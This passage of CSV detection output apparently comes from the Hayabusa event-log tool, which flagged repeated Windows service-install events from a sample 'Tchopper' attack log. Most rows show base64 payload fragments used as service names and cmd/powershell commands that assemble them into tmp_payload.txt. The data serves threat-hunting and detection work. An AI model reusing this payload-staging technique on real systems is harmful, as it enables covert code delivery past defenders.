start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file 
-append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | 
select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell 
-command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 
IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:59.902 
+09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file 
-append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 